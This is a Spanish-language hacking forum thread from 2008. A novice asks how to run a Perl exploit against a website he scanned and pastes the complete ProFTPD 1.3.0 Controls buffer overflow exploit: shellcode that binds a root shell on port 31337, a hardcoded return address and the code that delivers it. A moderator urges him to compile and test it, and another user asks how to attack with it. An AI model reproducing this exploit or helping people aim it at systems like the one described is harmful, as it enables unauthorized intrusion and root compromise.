Vota por nosotros en el ranking web que participamos
Bienvenido(a),
Visitante
. Favor de
ingresar
o
registrarse
.
¿Perdiste tu
email de activación?
- Octubre 10, 2008, 02:22:46
Visita:
Articulos
-
Juegos Gratis
-
Da Foros
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderadores:
OzX
,
[ E0F ] d0RkNet
) | Tema:
una pregunta sobre exploit de perl
0 Usuarios y 1 Visitante están viendo este tema.
« anterior
próximo »
Páginas:
[
1
]
Autor
Tema: una pregunta sobre exploit de perl (Leído 530 veces)
skullmaster-Back-
Visitante
una pregunta sobre exploit de perl
«
en:
Febrero 06, 2008, 09:12:24 »
saludos, bueno disculpen la ignorancia, y si este tema ya fue tratado, pues perdonenme no lo e encontrado! :S este es mi punto, tengo una web con una vulnerabilidad que es:
ProFTPD Controls Module Local Buffer Overflow Vulnerability
en el puerto: 21
ahora tengo el exploit que es hecho en perl, ahora yo vi en un video que supuestamente te enseñaban a usarlo, que tenia que crear una carpeta asi por ejemplo:
C:\perl\bin
y metia mi exploit el code del exploit en un .txt y le ponia por ejemplo asi: exploit.pl
y que para ejecutarlo, me metia en el cmd ponia cd (enter) cd C:\PERL\BIN (enter) luego ponia: exploit.pl
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
www.webAtakada.com
y le daba a enter, ahora yo no tengo ningun compilador o el programa de perl en mi pc, necesito descargarlo para poder usar el exploit?
y otra cosa, esa es la manera correcta de ejecutar este exploit?
Bueno disculpen las molestias, pero es que soy nuevo y leo lo que puedo!
EDITADO: Si te sirven o les sirve, aqui dejo las vulnerabilidades que escanee hasta los momentos:
Salu2's!
«
Última modificación: Febrero 06, 2008, 09:17:40 por skullmaster123
»
En línea
ManCuerTex (ViPeR)
Moderador Global
Gran Colaborador
Desconectado
Mensajes: 1828
Cuando el respeto se pierde... muere la magia
Re: una pregunta sobre exploit de perl
«
Respuesta #1 en:
Febrero 07, 2008, 03:26:53 »
Mirate este tema:
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
Saludos,
En línea
Soñaré Contigo Por Si No Te Veo Mañana...
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
Hacking Empezando desde 0
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
Mancuertex Hacking & Security
skullmaster-Back-
Visitante
Re: una pregunta sobre exploit de perl
«
Respuesta #2 en:
Febrero 07, 2008, 12:11:44 »
cierto, disculpa Viper, fue una tonteria mia por no buscar bien! solo una cosa (que debio ser la verdadera pregunta) este exploit sirve con la primera vulnerabilidad que postte (que esta en amarillo) ya que lo encontre justo para esa!
Código:
#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_24.pl, v1.0 2007/02/18 19:24:22 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
# [Old style school sploit against gcc 3.x and linux kernel 2.4]
#
# Original Advisory :
# http://www.coresecurity.com/?action=item&id=1594
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.4 exploitation against gcc 3.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a <bind_shell> as payload since a normal setuid + execve seems that doesn't work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0a on Slackware 11.0 compiled with gcc 3.4.6
# *** Against v1.3.0a -- server *could* remain up (in a Denial of Service condition) without binding shell
#
# revenge @darklight~$ ./revenge_proftpd_ctrls_24.pl /usr/local/var/proftpd/proftpd.sock 1
# [ wait some secs then nc on port 31337 ]
# anyone @anywhere:~$ nc <host> 31337
# id
# uid=0(root) gid=0(root) groups=50(ftp)
# exit
# [ after that server will deactivate ]
#
# Alfredo "revenge" Pesoli
#
# http://www.0xcafebabe.it/
# <revenge @0xcafebabe.it>
#
use strict;
use Socket;
if ( @ARGV < 2 ) { &usage(); }
my $hellcode =
# *** Generated with libShellCode
# setuid(0) + setgid(0) + bind(/bin/sh) on port 31337
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x31\xdb\xb0\x2e\xcd\x80".
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80".
"\x89\xc7\x31\xc9\x66\xb9\x7a\x69\x52\x66\x51\x43\x66\x53\x89\xe1".
"\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd".
"\x80\x31\xc0\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc3".
"\x89\xd9\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\xeb\x18\x5e\x31\xc0\x88".
"\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d".
"\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
my $rsock = shift;
my $tn = shift;
my $ret;
my $nop = "\x90"x200;
use constant LSOCK => '/tmp/tmp.sock';
my %targets = (
'1' => "\x55\xef\xff\xbf" # Slackware 11.0
# Add here your target RET
);
my %tname = (
'1' => "Slackware 11.0"
);
$ret = $targets{$tn};
my $buffer = $nop.$hellcode.("$ret"x70);
my $l = length($buffer);
socket (SOCK, PF_UNIX, SOCK_STREAM, 0) or die "Unable to create socket : $!";
my $rfile = sockaddr_un($rsock);
unlink LSOCK;
my $lfile = sockaddr_un(LSOCK);
bind (SOCK, $lfile) or die "Unable to bind to $lfile";
chmod (00700, LSOCK);
connect (SOCK, $rfile) or die "\nUnable to connect to ".$rsock."\nMaybe server is down or incorrect path\n\n";
print "\n Request length => ".$l."\n";
print " Target => ".$tname{$tn}."\n";
send SOCK, pack("s2", 0),0;
send SOCK, pack("s2", 1,0),0;
send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0;
send SOCK, $buffer,0;
close SOCK;
print "\n [#] Request sent - try to connect on port 31337\n\n";
sub usage() {
print "\n ProFTPD 1.3.0/1.3.0a Controls Buffer Overflow [ Old Style school ]\n";
print " Alfredo \"revenge\" Pesoli\n";
print " <revenge\ @0xcafebabe.it>\n\n";
print "Usage : $0 <path_to_unix_socket> <targets>\n";
print " Ex : $0 /usr/local/var/proftpd/proftpd.sock 1\n";
print "\n Available Targets :\n";
print " 1 => 0xbfffef55 (Slackware 11.0)\n\n";
exit();
}
si no me equivoco eso es perl, tu crees que sirva para esa vulnerabilidad? disculpa las molestias!
Salu2's!
En línea
ManCuerTex (ViPeR)
Moderador Global
Gran Colaborador
Desconectado
Mensajes: 1828
Cuando el respeto se pierde... muere la magia
Re: una pregunta sobre exploit de perl
«
Respuesta #3 en:
Febrero 07, 2008, 06:20:03 »
Eso parece, compilalo, pruébalo y nos cuentas como va esa shell por el 31337.
SAlud0s!
En línea
Soñaré Contigo Por Si No Te Veo Mañana...
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
Hacking Empezando desde 0
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
Mancuertex Hacking & Security
the_antrax
Visitante
Re: una pregunta sobre exploit de perl
«
Respuesta #4 en:
Febrero 09, 2008, 09:58:29 »
hola......... bueno Mancuertex disculpame la boberia y la tonta pregunta.............. pero como uso este exploit.......
osea como "ataco" con el....................
En línea
aleqiu
Colaborador
Desconectado
Mensajes: 822
De los Errores Aprendemos
Re: una pregunta sobre exploit de perl
«
Respuesta #5 en:
Julio 07, 2008, 01:13:48 »
mejor segui leendo ademas si queres compilar proFTPd tenes bajarte
"Active Perl"
busca manuales y navega con foro bas encontras tus repuesta
ese exploit se ejecuta con Dos
o sino fijate y aprende perl por que esta con errores ese exploit
saludos
En línea
er_davids
Miembro
Desconectado
Mensajes: 66
Re: una pregunta sobre exploit de perl
«
Respuesta #6 en:
Julio 08, 2008, 10:12:22 »
Está bien que quieras ayudar CiberTron, pero date cuenta de la fecha del post
, la última respuesta fue
Febrero 09, 2008
. skullmaster-Back- ya ni está registrado en la web, el exploit estará antiguo y lo habrá compilado hace 3 o 4 meses
Bueno ya aprobechando, para los que tengan dudas como él, ese post es bueno para aprender a compilar y para ver qué sistema usan los exploits, mirar la 1ª línea que generalmente lo pone"
#!/usr/bin/perl -w
"
En línea
Hyzoru
Recien Llegado
Desconectado
Mensajes: 12
Aprendiendo (?)
Re: una pregunta sobre exploit de perl
«
Respuesta #7 en:
Julio 17, 2008, 11:09:13 »
Cita de: CiberTron en Julio 07, 2008, 01:13:48
mejor segui leendo ademas si queres compilar proFTPd tenes bajarte
"Active Perl"
busca manuales y navega con foro bas encontras tus repuesta
ese exploit se ejecuta con Dos
o sino fijate y aprende perl por que esta con errores ese exploit
saludos
Normalmente cuando ejecutas el shell te dice Como funciona...Siempre trae sus propias instruciones, o me equivoko?
En línea
Feliz
er_davids
Miembro
Desconectado
Mensajes: 66
Re: una pregunta sobre exploit de perl
«
Respuesta #8 en:
Julio 20, 2008, 10:02:50 »
Eso es según el autor, algunos le pondrán dibujos, cuadros, texto o instrucciones y otros no le ponen nada
Aunque generalmente traen las intrucciones.
En línea
Páginas:
[
1
]
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderadores:
OzX
,
[ E0F ] d0RkNet
) | Tema:
una pregunta sobre exploit de perl
« anterior
próximo »
Ir a:
Por favor selecciona un destino:
-----------------------------
Foros De Consulta General
-----------------------------
=> Novedades
=> Dudas, Comentarios Y Sugerencias
=> Top 100
=> Off-Topic
=> Revista E-Zine
===> Noticias
-----------------------------
Phreaking, Hacking y Seguridad
-----------------------------
=> HacK GeneraL
===> Ingenieria Inversa
===> Encriptacion, Cryptografia
===> TV HACK
===> Cursos y Ezines
=====> Trucos Internet
=====> Textos Hacking
===> Defacing
=> Seguridad
=> Phreaking
===> Moviles
=> Bug y Exploits
===> Directorio de Exploits
=> Wargames, Retos Hack
-----------------------------
Hack Novato
-----------------------------
=> Hack para newbies
=> Todo Messenger
=> Troyanos y virus
-----------------------------
Sistemas Operativos
-----------------------------
=> Windows y otros sistemas operativos no libres
===> Problemas Tecnicos Windows
=> Sistemas operativos libres.
===> GNU/Linux
===> Manuales y Tutoriales
===> Descargas
-----------------------------
Programacion
-----------------------------
=> Programación
===> Programación Basica
===> Otros Lenguajes
===> Visual Basic y Net
===> ASM
===> Programacion Shell
===> Perl
===> Carbide C/C#/C++
===> Batch
===> SQL
=> Programacion para webmasters
===> Consultas Generales
===> Php
===> Html, XHTML, CSS
===> Java - Java Script
===> CMS O Scripts Pre-Fabricados
===> Posicionamiento en buscadores
-----------------------------
Artes Graficas
-----------------------------
=> Diseño Grafico
===> Battle Arts
===> Flash
===> Tutoriales
===> Galerías
===> Software
-----------------------------
Area Tecnica
-----------------------------
=> Networking & Wireless
=> Overclocking, Refrigeracion y demas
=> Hardware
===> Biblioteca Tecnica
=> Electronica Y Robotica
-----------------------------
Programas
-----------------------------
=> Software
===> Configuraciones de software
===> Pedidos de software
=> Cracks & Serialz
=> P2p, Bittorrent, Elinks
-----------------------------
Multimedia Y Divx
-----------------------------
=> Juegos PC Y Consolas
===> Dudas ayudas y comentarios de juegos
===> Pedidos de juegos
===> Juegos de Consola
=> Mp3
=> Multimedia
=> Peliculas Divx
-----------------------------
Entretenimiento Y sitios de interes
-----------------------------
=> Juegos, Humor y Adultos. (Diversión)
===> Adultos
=> Paginas Webs Recomendadas
=> Videos
Powered by SMF 1.1.6
|
SMF © 2006-2007, Simple Machines LLC
Loading...